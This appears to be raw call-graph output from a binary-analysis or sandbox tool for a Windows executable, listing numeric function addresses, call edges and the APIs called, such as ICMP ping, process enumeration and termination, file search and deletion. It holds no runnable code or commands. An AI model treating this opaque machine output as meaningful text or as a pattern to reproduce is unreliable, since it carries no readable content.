96018->96005 96018->96007 96018->96008 96018->96009 96018->96015 96018->96016 96018->96017 96019 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96018->96019 96020 226115 96018->96020 96022 1e0aae messages 96018->96022 96050 1e1990 96018->96050 96112 1e1e50 96018->96112 96019->96018 96122 243fe1 81 API calls __wsopen_s 96020->96122 96123 243fe1 81 API calls __wsopen_s 96022->96123 96024 1dbe38 96023->96024 96025 1dbe67 96024->96025 96943 1dbfa5 96024->96943 96025->95999 96027->95999 96028->95999 96029->95999 96031 1f014b 8 API calls 96030->96031 96032 1ebc65 96031->96032 96033 1db329 8 API calls 96032->96033 96034 1ebc70 96033->96034 96034->95999 96035->95999 96036->95999 96037->95999 96038->95999 96039->95978 96040->95995 96041->95999 96042->95999 96043->95999 96045 1dbefc __fread_nolock 96044->96045 96046 1dbeed 96044->96046 96045->95999 96046->96045 96047 1f017b 8 API calls 96046->96047 96047->96045 96048->95995 96049->95984 96051 1e1a2e 96050->96051 96052 1e19b6 96050->96052 96053 226a4d 96051->96053 96063 1e1a3d 96051->96063 96054 226b60 96052->96054 96055 1e19c3 96052->96055 96057 226b54 96053->96057 96058 226a58 96053->96058 96132 2585db 207 API calls 2 library calls 96054->96132 96065 226b84 96055->96065 96066 1e19cd 96055->96066 96131 243fe1 81 API calls __wsopen_s 96057->96131 96130 1eb35c 207 API calls 96058->96130 96059 1e0340 207 API calls 96059->96063 96062 226bb5 96068 226be2 96062->96068 96069 226bc0 96062->96069 96063->96059 96067 1e1ba9 96063->96067 96070 1e19e0 messages 96063->96070 96072 226979 96063->96072 96079 226908 96063->96079 96083 1e1bb5 96063->96083 96098 1e1af4 96063->96098 96064 1e1b62 messages 96064->96070 96080 1e1a23 messages 96064->96080 96090 1dbed9 8 API calls 96064->96090 96065->96062 96071 226b9c 96065->96071 96066->96070 96075 1dbed9 8 API calls 96066->96075 96067->96083 96127 243fe1 81 API calls __wsopen_s 96067->96127 96135 2560e6 96068->96135 96134 2585db 207 API calls 2 library calls 96069->96134 96070->96080 96085 226dd9 96070->96085 96209 25808f 53 API calls __wsopen_s 96070->96209 96133 243fe1 81 API calls __wsopen_s 96071->96133 96129 243fe1 81 API calls __wsopen_s 96072->96129 96075->96070 96128 243fe1 81 API calls __wsopen_s 96079->96128 96080->96018 96082 226c81 96207 241ad8 8 API calls 96082->96207 96083->96018 96086 226e0f 96085->96086 96234 2581ce 65 API calls 96085->96234 96236 1db4c8 8 API calls 96086->96236 96087 226db7 96210 1d8ec0 96087->96210 96090->96070 96092 226ded 96095 1d8ec0 52 API calls 96092->96095 96094 226c08 96142 24148b 96094->96142 96109 226df5 _wcslen 96095->96109 96097 226c93 96208 1dbd07 8 API calls 96097->96208 96098->96067 96126 1e1ca0 8 API calls 96098->96126 96099 22691d messages 96099->96064 96099->96072 96099->96080 96103 1e1b55 96103->96064 96103->96067 96104 226dbf _wcslen 96104->96085 96233 1db4c8 8 API calls 96104->96233 96106 226c9c 96111 24148b 8 API calls 96106->96111 96109->96086 96235 1db4c8 8 API calls 96109->96235 96111->96070 96115 1e1e6d messages 96112->96115 96113 1e2512 96119 1e1ff7 messages 96113->96119 96942 1ebe08 39 API calls 96113->96942 96115->96113 96117 227837 96115->96117 96115->96119 96121 22766b 96115->96121 96940 1ee322 8 API calls messages 96115->96940 96117->96119 96941 1fd2d5 39 API calls 96117->96941 96119->96018 96939 1fd2d5 39 API calls 96121->96939 96122->96022 96123->96017 96124->96017 96125->96017 96126->96103 96127->96080 96128->96099 96129->96070 96130->96064 96131->96054 96132->96070 96133->96080 96134->96070 96136 256101 96135->96136 96141 226bed 96135->96141 96237 1f017b 96136->96237 96138 256123 96138->96141 96246 1f014b 96138->96246 96255 241400 8 API calls 96138->96255 96141->96082 96141->96094 96143 241499 96142->96143 96145 226c32 96142->96145 96144 1f014b 8 API calls 96143->96144 96143->96145 96144->96145 96146 1e2b20 96145->96146 96147 1e2b86 96146->96147 96148 1e2fc0 96146->96148 96150 227bd8 96147->96150 96151 1e2ba0 96147->96151 96402 1f05b2 5 API calls __Init_thread_wait 96148->96402 96365 257af9 96150->96365 96262 1e3160 96151->96262 96153 1e2fca 96163 1e300b 96153->96163 96403 1db329 96153->96403 96155 227be4 96155->96070 96158 1e3160 9 API calls 96159 1e2bc6 96158->96159 96160 1e2bfc 96159->96160 96159->96163 96162 227bfd 96160->96162 96186 1e2c18 __fread_nolock 96160->96186 96161 227bed 96161->96070 96413 243fe1 81 API calls __wsopen_s 96162->96413 96163->96161 96410 1db4c8 8 API calls 96163->96410 96166 1e2fe4 96409 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96166->96409 96167 1e3049 96411 1ee6e8 207 API calls 96167->96411 96169 227c15 96414 243fe1 81 API calls __wsopen_s 96169->96414 96172 1e2d3f 96173 1e2d4c 96172->96173 96174 227c78 96172->96174 96176 1e3160 9 API calls 96173->96176 96416 2561a2 53 API calls _wcslen 96174->96416 96178 1e2d59 96176->96178 96177 1f014b 8 API calls 96177->96186 96181 227da1 96178->96181 96183 1e3160 9 API calls 96178->96183 96179 1e3082 96412 1efe39 8 API calls 96179->96412 96180 1f017b 8 API calls 96180->96186 96191 227c10 96181->96191 96417 243fe1 81 API calls __wsopen_s 96181->96417 96187 1e2d73 96183->96187 96185 1e0340 207 API calls 96185->96186 96186->96167 96186->96169 96186->96172 96186->96177 96186->96180 96186->96185 96188 227c59 96186->96188 96186->96191 96187->96181 96190 1dbed9 8 API calls 96187->96190 96193 1e2dd7 messages 96187->96193 96415 243fe1 81 API calls __wsopen_s 96188->96415 96190->96193 96191->96070 96192 1e3160 9 API calls 96192->96193 96193->96179 96193->96181 96193->96191 96193->96192 96195 1e2e8b messages 96193->96195 96272 1eac3e 96193->96272 96291 25a5b2 96193->96291 96297 250fb8 96193->96297 96322 25a9ac 96193->96322 96330 25ad47 96193->96330 96335 24f94a 96193->96335 96344 259fe8 96193->96344 96347 25a6aa 96193->96347 96355 259ffc 96193->96355 96358 24664c 96193->96358 96194 1e2f2d 96194->96070 96195->96194 96401 1ee322 8 API calls messages 96195->96401 96207->96097 96208->96106 96209->96087 96211 1d8ed5 96210->96211 96227 1d8ed2 96210->96227 96212 1d8edd 96211->96212 96213 1d8f0b 96211->96213 96935 1f5536 26 API calls 96212->96935 96216 1d8f1d 96213->96216 96221 216a38 96213->96221 96224 216b1f 96213->96224 96936 1efe6f 51 API calls 96216->96936 96217 216b37 96217->96217 96219 1f014b 8 API calls 96223 1d8ef7 96219->96223 96220 1d8eed 96220->96219 96226 1f017b 8 API calls 96221->96226 96228 216ab1 96221->96228 96225 1db329 8 API calls 96223->96225 96938 1f54f3 26 API calls 96224->96938 96225->96227 96229 216a81 96226->96229 96227->96104 96937 1efe6f 51 API calls 96228->96937 96230 1f014b 8 API calls 96229->96230 96231 216aa8 96230->96231 96232 1db329 8 API calls 96231->96232 96232->96228 96233->96085 96234->96092 96235->96086 96236->96080 96238 1f014b ___std_exception_copy 96237->96238 96239 1f016a 96238->96239 96242 1f016c 96238->96242 96256 1f521d 7 API calls 2 library calls 96238->96256 96239->96138 96241 1f09dd 96258 1f3614 RaiseException 96241->96258 96242->96241 96257 1f3614 RaiseException 96242->96257 96245 1f09fa 96245->96138 96248 1f0150 ___std_exception_copy 96246->96248 96247 1f016a 96247->96138 96248->96247 96251 1f016c 96248->96251 96259 1f521d 7 API calls 2 library calls 96248->96259 96250 1f09dd 96261 1f3614 RaiseException 96250->96261 96251->96250 96260 1f3614 RaiseException 96251->96260 96254 1f09fa 96254->96138 96255->96138 96256->96238 96257->96241 96258->96245 96259->96248 96260->96250 96261->96254 96263 1e31a1 96262->96263 96267 1e317d 96262->96267 96418 1f05b2 5 API calls __Init_thread_wait 96263->96418 96265 1e31ab 96265->96267 96419 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96265->96419 96271 1e2bb0 96267->96271 96420 1f05b2 5 API calls __Init_thread_wait 96267->96420 96268 1e9f47 96268->96271 96421 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96268->96421 96271->96158 96273 1d8ec0 52 API calls 96272->96273 96274 1eac68 96273->96274 96275 1ebc58 8 API calls 96274->96275 96276 1eac7f 96275->96276 96284 1eb09b _wcslen 96276->96284 96436 1dc98d 39 API calls 96276->96436 96280 1ebbbe 43 API calls 96280->96284 96283 1d6c03 8 API calls 96283->96284 96284->96280 96284->96283 96285 1eb1fb 96284->96285 96286 1dc98d 39 API calls 96284->96286 96287 1d8ec0 52 API calls 96284->96287 96422 1d396b 96284->96422 96432 1d3907 96284->96432 96437 1f4d98 96284->96437 96447 1d7ad5 96284->96447 96452 1dad40 8 API calls __fread_nolock 96284->96452 96453 1d7b1a 8 API calls 96284->96453 96454 1d8577 96284->96454 96285->96193 96286->96284 96287->96284 96292 25a5c5 96291->96292 96293 1d8ec0 52 API calls 96292->96293 96296 25a5d4 96292->96296 96294 25a632 96293->96294 96566 2418a9 96294->96566 96296->96193 96298 250fe1 96297->96298 96299 25100f WSAStartup 96298->96299 96623 1dc98d 39 API calls 96298->96623 96301 251054 96299->96301 96312 251023 messages 96299->96312 96610 1ec1f6 96301->96610 96302 250ffc 96302->96299 96624 1dc98d 39 API calls 96302->96624 96306 1d8ec0 52 API calls 96308 251069 96306->96308 96307 25100b 96307->96299 96615 1ef9d4 WideCharToMultiByte 96308->96615 96310 251075 inet_addr gethostbyname 96311 251093 IcmpCreateFile 96310->96311 96310->96312 96311->96312 96313 2510d3 96311->96313 96312->96193 96314 1f017b 8 API calls 96313->96314 96315 2510ec 96314->96315 96625 1d423c 96315->96625 96318 251102 IcmpSendEcho 96320 25114c 96318->96320 96319 25112b IcmpSendEcho 96319->96320 96321 251212 IcmpCloseHandle WSACleanup 96320->96321 96321->96312 96323 25a9c8 96322->96323 96325 25aa08 96322->96325 96323->96193 96324 25aa26 96324->96323 96328 25aa8e 96324->96328 96663 1dc98d 39 API calls 96324->96663 96325->96324 96662 1dc98d 39 API calls 96325->96662 96630 240372 96328->96630 96331 1d8ec0 52 API calls 96330->96331 96332 25ad63 96331->96332 96691 23dd87 CreateToolhelp32Snapshot Process32FirstW 96332->96691 96334 25ad72 96334->96193 96336 1f017b 8 API calls 96335->96336 96337 24f95b 96336->96337 96338 1d423c 8 API calls 96337->96338 96339 24f965 96338->96339 96340 1d8ec0 52 API calls 96339->96340 96341 24f97c GetEnvironmentVariableW 96340->96341 96772 24160f 8 API calls 96341->96772 96343 24f999 messages 96343->96193 96773 2589b6 96344->96773 96346 259ff8 96346->96193 96349 25a705 96347->96349 96354 25a6c5 96347->96354 96348 25a723 96352 25a780 96348->96352 96348->96354 96887 1dc98d 39 API calls 96348->96887 96349->96348 96886 1dc98d 39 API calls 96349->96886 96353 240372 58 API calls 96352->96353 96353->96354 96354->96193 96356 2589b6 119 API calls 96355->96356 96357 25a00c 96356->96357 96357->96193 96359 1d8ec0 52 API calls 96358->96359 96360 246662 96359->96360 96888 23dc54 96360->96888 96362 24666a 96363 24666e GetLastError 96362->96363 96364 246683 96362->96364 96363->96364 96364->96193 96366 257b52 96365->96366 96367 257b38 96365->96367 96369 2560e6 8 API calls 96366->96369 96930 243fe1 81 API calls __wsopen_s 96367->96930 96370 257b5d 96369->96370 96371 1e0340 206 API calls 96370->96371 96372 257bc1 96371->96372 96373 257c5c 96372->96373 96377 257c03 96372->96377 96396 257b4a 96372->96396 96374 257cb0 96373->96374 96375 257c62 96373->96375 96376 1d8ec0 52 API calls 96374->96376 96374->96396 96931 241ad8 8 API calls 96375->96931 96378 257cc2 96376->96378 96380 24148b 8 API calls 96377->96380 96381 1dc2c9 8 API calls 96378->96381 96383 257c3b 96380->96383 96384 257ce6 CharUpperBuffW 96381->96384 96382 257c85 96932 1dbd07 8 API calls 96382->96932 96386 1e2b20 206 API calls 96383->96386 96387 257d00 96384->96387 96386->96396 96388 257d07 96387->96388 96389 257d53 96387->96389 96393 24148b 8 API calls 96388->96393 96390 1d8ec0 52 API calls 96389->96390 96391 257d5b 96390->96391 96933 1eaa65 9 API calls 96391->96933 96394 257d35 96393->96394 96395 1e2b20 206 API calls 96394->96395 96395->96396 96396->96155 96397 257d65 96397->96396 96398 1d8ec0 52 API calls 96397->96398 96399 257d80 96398->96399 96934 1dbd07 8 API calls 96399->96934 96401->96195 96402->96153 96404 1db338 _wcslen 96403->96404 96405 1f017b 8 API calls 96404->96405 96406 1db360 __fread_nolock 96405->96406 96407 1f014b 8 API calls 96406->96407 96408 1db376 96407->96408 96408->96166 96409->96163 96410->96167 96411->96179 96412->96179 96413->96191 96414->96191 96415->96191 96416->96187 96417->96191 96418->96265 96419->96267 96420->96268 96421->96271 96423 1d3996 ___scrt_fastfail 96422->96423 96466 1d5f32 96423->96466 96427 1d3a1c 96428 1d3a3a Shell_NotifyIconW 96427->96428 96429 2140cd Shell_NotifyIconW 96427->96429 96470 1d61a9 96428->96470 96431 1d3a50 96431->96284 96433 1d3969 96432->96433 96434 1d3919 ___scrt_fastfail 96432->96434 96433->96284 96435 1d3938 Shell_NotifyIconW 96434->96435 96435->96433 96436->96284 96438 1f4e1b 96437->96438 96439 1f4da6 96437->96439 96554 1f4e2d 40 API calls 3 library calls 96438->96554 96446 1f4dcb 96439->96446 96552 1ff649 20 API calls __dosmaperr 96439->96552 96442 1f4e28 96442->96284 96443 1f4db2 96553 202b5c 26 API calls pre_c_initialization 96443->96553 96445 1f4dbd 96445->96284 96446->96284 96448 1f017b 8 API calls 96447->96448 96449 1d7afa 96448->96449 96450 1f014b 8 API calls 96449->96450 96451 1d7b08 96450->96451 96451->96284 96452->96284 96453->96284 96455 216610 96454->96455 96456 1d8587 _wcslen 96454->96456 96556 1dadf4 96455->96556 96459 1d859d 96456->96459 96460 1d85c2 96456->96460 96458 216619 96458->96458 96555 1d88e8 8 API calls 96459->96555 96461 1f014b 8 API calls 96460->96461 96463 1d85ce 96461->96463 96465 1f017b 8 API calls 96463->96465 96464 1d85a5 __fread_nolock 96464->96284 96465->96464 96467 1d5f4e 96466->96467 96468 1d39eb 96466->96468 96467->96468 96469 215070 DestroyIcon 96467->96469 96468->96427 96500 23d11f 42 API calls 96468->96500 96469->96468 96471 1d61c6 96470->96471 96490 1d62a8 96470->96490 96472 1d7ad5 8 API calls 96471->96472 96473 1d61d4 96472->96473 96474 215278 LoadStringW 96473->96474 96475 1d61e1 96473->96475 96478 215292 96474->96478 96476 1d8577 8 API calls 96475->96476 96477 1d61f6 96476->96477 96479 1d6203 96477->96479 96486 2152ae 96477->96486 96481 1dbed9 8 API calls 96478->96481 96485 1d6229 ___scrt_fastfail 96478->96485 96479->96478 96480 1d620d 96479->96480 96501 1d6b7c 96480->96501 96481->96485 96488 1d628e Shell_NotifyIconW 96485->96488 96486->96485 96487 2152f1 96486->96487 96519 1dbf73 96486->96519 96525 1efe6f 51 API calls 96487->96525 96488->96490 96490->96431 96494 215310 96496 1d6b7c 8 API calls 96494->96496 96495 2152e3 96497 1d7bb5 8 API calls 96495->96497 96498 215321 96496->96498 96497->96487 96499 1d6b7c 8 API calls 96498->96499 96499->96485 96500->96427 96502 1d6b93 96501->96502 96503 2157fe 96501->96503 96526 1d6ba4 96502->96526 96505 1f014b 8 API calls 96503->96505 96507 215808 _wcslen 96505->96507 96506 1d621b 96510 1d7bb5 96506->96510 96508 1f017b 8 API calls 96507->96508 96509 215841 __fread_nolock 96508->96509 96511 1d7bc7 96510->96511 96512 21641d 96510->96512 96541 1d7bd8 96511->96541 96551 2313c8 8 API calls __fread_nolock 96512->96551 96515 1d7bd3 96515->96485 96516 216433 96517 216427 96517->96516 96518 1dbed9 8 API calls 96517->96518 96518->96516 96520 1f017b 8 API calls 96519->96520 96521 1dbf88 96520->96521 96522 1f014b 8 API calls 96521->96522 96523 1dbf96 96522->96523 96524 23a350 9 API calls 96523->96524 96524->96495 96525->96494 96527 1d6bb4 _wcslen 96526->96527 96528 215860 96527->96528 96529 1d6bc7 96527->96529 96531 1f014b 8 API calls 96528->96531 96536 1d7d74 96529->96536 96532 21586a 96531->96532 96534 1f017b 8 API calls 96532->96534 96533 1d6bd4 __fread_nolock 96533->96506 96535 21589a __fread_nolock 96534->96535 96537 1d7d8a 96536->96537 96540 1d7d85 __fread_nolock 96536->96540 96538 1f017b 8 API calls 96537->96538 96539 216528 96537->96539 96538->96540 96539->96539 96540->96533 96542 1d7be7 96541->96542 96548 1d7c1b __fread_nolock 96541->96548 96543 21644e 96542->96543 96544 1d7c0e 96542->96544 96542->96548 96546 1f014b 8 API calls 96543->96546 96545 1d7d74 8 API calls 96544->96545 96545->96548 96547 21645d 96546->96547 96549 1f017b 8 API calls 96547->96549 96548->96515 96550 216491 __fread_nolock 96549->96550 96551->96517 96552->96443 96553->96445 96554->96442 96555->96464 96557 1dae02 96556->96557 96559 1dae0b __fread_nolock 96556->96559 96557->96559 96560 1dc2c9 96557->96560 96559->96458 96561 1dc2dc 96560->96561 96565 1dc2d9 __fread_nolock 96560->96565 96562 1f014b 8 API calls 96561->96562 96563 1dc2e7 96562->96563 96564 1f017b 8 API calls 96563->96564 96564->96565 96565->96559 96567 2418b6 96566->96567 96568 1f014b 8 API calls 96567->96568 96569 2418bd 96568->96569 96572 23fcb5 96569->96572 96571 2418f7 96571->96296 96573 1dc2c9 8 API calls 96572->96573 96574 23fcc8 CharLowerBuffW 96573->96574 96580 23fcdb 96574->96580 96575 23fd19 96576 23fd2b 96575->96576 96605 1d655e 96575->96605 96579 1f017b 8 API calls 96576->96579 96577 1d655e 8 API calls 96577->96580 96584 23fd59 96579->96584 96580->96575 96580->96577 96589 23fce5 ___scrt_fastfail 96580->96589 96583 23fdb8 96586 1f014b 8 API calls 96583->96586 96583->96589 96585 23fd7b 96584->96585 96608 23fbed 8 API calls 96584->96608 96590 23fe0c 96585->96590 96587 23fdd2 96586->96587 96588 1f017b 8 API calls 96587->96588 96588->96589 96589->96571 96591 1dbf73 8 API calls 96590->96591 96592 23fe3e 96591->96592 96593 1dbf73 8 API calls 96592->96593 96594 23fe47 96593->96594 96595 1dbf73 8 API calls 96594->96595 96603 23fe50 96595->96603 96596 1d8577 8 API calls 96596->96603 96597 240114 96597->96583 96598 1dad40 8 API calls 96598->96603 96599 1f66f8 GetStringTypeW 96599->96603 96601 1f6641 39 API calls 96601->96603 96602 23fe0c 40 API calls 96602->96603 96603->96596 96603->96597 96603->96598 96603->96599 96603->96601 96603->96602 96604 1dbed9 8 API calls 96603->96604 96609 1f6722 GetStringTypeW 96603->96609 96604->96603 96606 1dc2c9 8 API calls 96605->96606 96607 1d6569 96606->96607 96607->96576 96608->96584 96609->96603 96611 1f017b 8 API calls 96610->96611 96612 1ec209 96611->96612 96613 1f014b 8 API calls 96612->96613 96614 1ec215 96613->96614 96614->96306 96616 1ef9fe 96615->96616 96617 1efa35 96615->96617 96618 1f017b 8 API calls 96616->96618 96629 1efe8a 8 API calls 96617->96629 96620 1efa05 WideCharToMultiByte 96618->96620 96628 1efa3e 8 API calls __fread_nolock 96620->96628 96622 1efa29 96622->96310 96623->96302 96624->96307 96626 1f014b 8 API calls 96625->96626 96627 1d424e 96626->96627 96627->96318 96627->96319 96628->96622 96629->96622 96664 2402aa 96630->96664 96633 2403f3 96680 2405e9 56 API calls __fread_nolock 96633->96680 96634 24040b 96636 240471 96634->96636 96639 24041b 96634->96639 96637 240507 96636->96637 96638 2404a1 96636->96638 96644 240399 __fread_nolock 96636->96644 96642 2405b0 96637->96642 96643 240510 96637->96643 96640 2404a6 96638->96640 96641 2404d1 96638->96641 96661 240453 96639->96661 96681 242855 10 API calls 96639->96681 96640->96644 96684 1dca5b 39 API calls 96640->96684 96641->96644 96685 1dca5b 39 API calls 96641->96685 96642->96644 96689 1dc63f 39 API calls 96642->96689 96645 240515 96643->96645 96646 24058d 96643->96646 96644->96323 96651 240554 96645->96651 96654 24051b 96645->96654 96646->96644 96688 1dc63f 39 API calls 96646->96688 96651->96644 96687 1dc63f 39 API calls 96651->96687 96654->96644 96686 1dc63f 39 API calls 96654->96686 96656 240427 96682 242855 10 API calls 96656->96682 96659 24043e __fread_nolock 96683 242855 10 API calls 96659->96683 96671 241844 96661->96671 96662->96324 96663->96328 96665 2402f7 96664->96665 96669 2402bb 96664->96669 96690 1dc98d 39 API calls 96665->96690 96667 2402f5 96667->96633 96667->96634 96667->96644 96668 1d8ec0 52 API calls 96668->96669 96669->96667 96669->96668 96670 1f4d98 40 API calls 96669->96670 96670->96669 96672 24184f 96671->96672 96673 1f014b 8 API calls 96672->96673 96674 241856 96673->96674 96675 241862 96674->96675 96676 241883 96674->96676 96677 1f017b 8 API calls 96675->96677 96678 1f017b 8 API calls 96676->96678 96679 24186b ___scrt_fastfail 96677->96679 96678->96679 96679->96644 96680->96644 96681->96656 96682->96659 96683->96661 96684->96644 96685->96644 96686->96644 96687->96644 96688->96644 96689->96644 96690->96667 96701 23e80e 96691->96701 96693 23de86 CloseHandle 96693->96334 96694 23ddd4 Process32NextW 96694->96693 96699 23ddcd 96694->96699 96695 1dbf73 8 API calls 96695->96699 96696 1db329 8 API calls 96696->96699 96698 1d7bb5 8 API calls 96698->96699 96699->96693 96699->96694 96699->96695 96699->96696 96699->96698 96707 1d568e 96699->96707 96749 1ee36b 41 API calls 96699->96749 96702 23e819 96701->96702 96703 23e830 96702->96703 96706 23e836 96702->96706 96750 1f6722 GetStringTypeW 96702->96750 96751 1f666b 39 API calls 96703->96751 96706->96699 96708 1dbf73 8 API calls 96707->96708 96709 1d56a4 96708->96709 96710 1dbf73 8 API calls 96709->96710 96711 1d56ac 96710->96711 96712 1dbf73 8 API calls 96711->96712 96713 1d56b4 96712->96713 96714 1dbf73 8 API calls 96713->96714 96715 1d56bc 96714->96715 96716 214da1 96715->96716 96717 1d56f0 96715->96717 96718 1dbed9 8 API calls 96716->96718 96719 1dacc0 8 API calls 96717->96719 96720 214daa 96718->96720 96721 1d56fe 96719->96721 96764 1dbd57 96720->96764 96723 1dadf4 8 API calls 96721->96723 96724 1d5708 96723->96724 96725 1d5733 96724->96725 96726 1dacc0 8 API calls 96724->96726 96727 1d5754 96725->96727 96741 1d5778 96725->96741 96744 214dcc 96725->96744 96729 1d5729 96726->96729 96732 1d655e 8 API calls 96727->96732 96727->96741 96731 1dadf4 8 API calls 96729->96731 96730 1d5789 96734 1dbed9 8 API calls 96730->96734 96735 1d579f 96730->96735 96731->96725 96738 1d5761 96732->96738 96733 1d8577 8 API calls 96746 214e8c 96733->96746 96734->96735 96737 1d57b3 96735->96737 96739 1dbed9 8 API calls 96735->96739 96736 1d57be 96743 1dbed9 8 API calls 96736->96743 96747 1d57c9 96736->96747 96737->96736 96742 1dbed9 8 API calls 96737->96742 96740 1dacc0 8 API calls 96738->96740 96738->96741 96739->96737 96740->96741 96752 1dacc0 96741->96752 96742->96736 96743->96747 96744->96733 96745 1d655e 8 API calls 96745->96746 96746->96741 96746->96745 96770 1dad40 8 API calls __fread_nolock 96746->96770 96747->96699 96749->96699 96750->96702 96751->96706 96753 1daccf 96752->96753 96755 1dace1 96752->96755 96754 1dc2c9 8 API calls 96753->96754 96761 1dacda __fread_nolock 96753->96761 96756 2205a3 __fread_nolock 96754->96756 96755->96753 96757 220557 96755->96757 96758 1dad07 96755->96758 96760 1f014b 8 API calls 96757->96760 96771 1d88e8 8 API calls 96758->96771 96762 220561 96760->96762 96761->96730 96763 1f017b 8 API calls 96762->96763 96763->96753 96765 1dbd71 96764->96765 96769 1dbd64 96764->96769 96766 1f014b 8 API calls 96765->96766 96767 1dbd7b 96766->96767 96768 1f017b 8 API calls 96767->96768 96768->96769 96769->96725 96770->96746 96771->96761 96772->96343 96774 1d8ec0 52 API calls 96773->96774 96775 2589ed 96774->96775 96797 258a32 messages 96775->96797 96811 259730 96775->96811 96777 258cde 96778 258eac 96777->96778 96783 258cec 96777->96783 96861 259941 59 API calls 96778->96861 96781 258ebb 96782 258ec7 96781->96782 96781->96783 96782->96797 96824 2588e3 96783->96824 96784 1d8ec0 52 API calls 96801 258aa6 96784->96801 96789 258d25 96838 1effe0 96789->96838 96792 258d45 96845 243fe1 81 API calls __wsopen_s 96792->96845 96793 258d5f 96846 1d7e12 96793->96846 96797->96346 96798 258d50 GetCurrentProcess TerminateProcess 96798->96793 96801->96777 96801->96784 96801->96797 96843 234ad3 8 API calls __fread_nolock 96801->96843 96844 258f7a 41 API calls 96801->96844 96803 258f22 96803->96797 96805 258f36 FreeLibrary 96803->96805 96804 258d9e 96858 2595d8 74 API calls 96804->96858 96805->96797 96809 258daf 96809->96803 96859 1e1ca0 8 API calls 96809->96859 96860 1db4c8 8 API calls 96809->96860 96862 2595d8 74 API calls 96809->96862 96812 1dc2c9 8 API calls 96811->96812 96813 25974b CharLowerBuffW 96812->96813 96863 239805 96813->96863 96817 1dbf73 8 API calls 96818 259787 96817->96818 96819 1dacc0 8 API calls 96818->96819 96820 25979b 96819->96820 96821 1dadf4 8 API calls 96820->96821 96823 2597a5 _wcslen 96821->96823 96822 2598bb _wcslen 96822->96801 96823->96822 96870 258f7a 41 API calls 96823->96870 96825 2588fe 96824->96825 96826 258949 96824->96826 96827 1f017b 8 API calls 96825->96827 96830 259af3 96826->96830 96828 258920 96827->96828 96828->96826 96829 1f014b 8 API calls 96828->96829 96829->96828 96831 259d08 messages 96830->96831 96835 259b17 _strcat _wcslen ___std_exception_copy 96830->96835 96831->96789 96832 1dca5b 39 API calls 96832->96835 96833 1dc63f 39 API calls 96833->96835 96834 1dc98d 39 API calls 96834->96835 96835->96831 96835->96832 96835->96833 96835->96834 96836 1d8ec0 52 API calls 96835->96836 96873 23f8c5 10 API calls _wcslen 96835->96873 96836->96835 96839 1efff5 96838->96839 96840 1f008d SetErrorMode 96839->96840 96841 1f005b 96839->96841 96842 1f007b CloseHandle 96839->96842 96840->96841 96841->96792 96841->96793 96842->96841 96843->96801 96844->96801 96845->96798 96847 1d7e1a 96846->96847 96848 1f014b 8 API calls 96847->96848 96849 1d7e28 96848->96849 96874 1d8445 96849->96874 96852 1d8470 96877 1dc760 96852->96877 96854 1d8480 96855 1f017b 8 API calls 96854->96855 96856 1d851c 96854->96856 96855->96856 96856->96809 96857 1e1ca0 8 API calls 96856->96857 96857->96804 96858->96809 96859->96809 96860->96809 96861->96781 96862->96809 96864 239825 _wcslen 96863->96864 96865 239914 96864->96865 96868 239919 96864->96868 96869 23985a 96864->96869 96865->96817 96865->96823 96868->96865 96872 1ee36b 41 API calls 96868->96872 96869->96865 96871 1ee36b 41 API calls 96869->96871 96870->96822 96871->96869 96872->96868 96873->96835 96875 1f014b 8 API calls 96874->96875 96876 1d7e30 96875->96876 96876->96852 96878 1dc76b 96877->96878 96879 221285 96878->96879 96884 1dc773 messages 96878->96884 96881 1f014b 8 API calls 96879->96881 96880 1dc77a 96880->96854 96882 221291 96881->96882 96884->96880 96885 1dc7e0 8 API calls messages 96884->96885 96885->96884 96886->96348 96887->96352 96889 1dbf73 8 API calls 96888->96889 96890 23dc73 96889->96890 96891 1dbf73 8 API calls 96890->96891 96892 23dc7c 96891->96892 96893 1dbf73 8 API calls 96892->96893 96894 23dc85 96893->96894 96912 1d5851 96894->96912 96899 23dcab 96901 1d568e 8 API calls 96899->96901 96900 1d6b7c 8 API calls 96900->96899 96902 23dcbf FindFirstFileW 96901->96902 96903 23dd4b FindClose 96902->96903 96907 23dcde 96902->96907 96908 23dd56 96903->96908 96904 23dd26 FindNextFileW 96904->96907 96905 1dbed9 8 API calls 96905->96907 96906 1d7bb5 8 API calls 96906->96907 96907->96903 96907->96904 96907->96905 96907->96906 96909 1d6b7c 8 API calls 96907->96909 96908->96362 96910 23dd17 DeleteFileW 96909->96910 96910->96904 96911 23dd42 FindClose 96910->96911 96911->96908 96924 2122d0 96912->96924 96915 1d587d 96917 1d8577 8 API calls 96915->96917 96916 1d5898 96918 1dbd57 8 API calls 96916->96918 96919 1d5889 96917->96919 96918->96919 96926 1d55dc 96919->96926 96922 23eab0 GetFileAttributesW 96923 23dc99 96922->96923 96923->96899 96923->96900 96925 1d585e GetFullPathNameW 96924->96925 96925->96915 96925->96916 96927 1d55ea 96926->96927 96928 1dadf4 8 API calls 96927->96928 96929 1d55fe 96928->96929 96929->96922 96930->96396 96931->96382 96932->96396 96933->96397 96934->96396 96935->96220 96936->96220 96937->96224 96938->96217 96939->96121 96940->96115 96941->96119 96942->96119 96960 1dcf80 96943->96960 96945 1dbfb5 96946 220db6 96945->96946 96947 1dbfc3 96945->96947 96969 1db4c8 8 API calls 96946->96969 96949 1f014b 8 API calls 96947->96949 96951 1dbfd4 96949->96951 96950 220dc1 96952 1dbf73 8 API calls 96951->96952 96953 1dbfde 96952->96953 96954 1dbfed 96953->96954 96955 1dbed9 8 API calls 96953->96955 96956 1f014b 8 API calls 96954->96956 96955->96954 96957 1dbff7 96956->96957 96968 1dbe7b 39 API calls 96957->96968 96959 1dc01b 96959->96025 96961 1dd1c7 96960->96961 96966 1dcf93 96960->96966 96961->96945 96963 1dd03d 96963->96945 96964 1dbf73 8 API calls 96964->96966 96966->96963 96966->96964 96970 1f05b2 5 API calls __Init_thread_wait 96966->96970 96971 1f0413 29 API calls __onexit 96966->96971 96972 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96966->96972 96968->96959 96969->96950 96970->96966 96971->96966 96972->96966 97461 1e0ebf 97462 1e0ed3 97461->97462 97467 1e1425 97461->97467 97463 1e0ee5 97462->97463 97464 1f014b 8 API calls 97462->97464 97465 22562c 97463->97465 97468 1e0f3e 97463->97468 97494 1db4c8 8 API calls 97463->97494 97464->97463 97495 241b14 8 API calls 97465->97495 97467->97463 97471 1dbed9 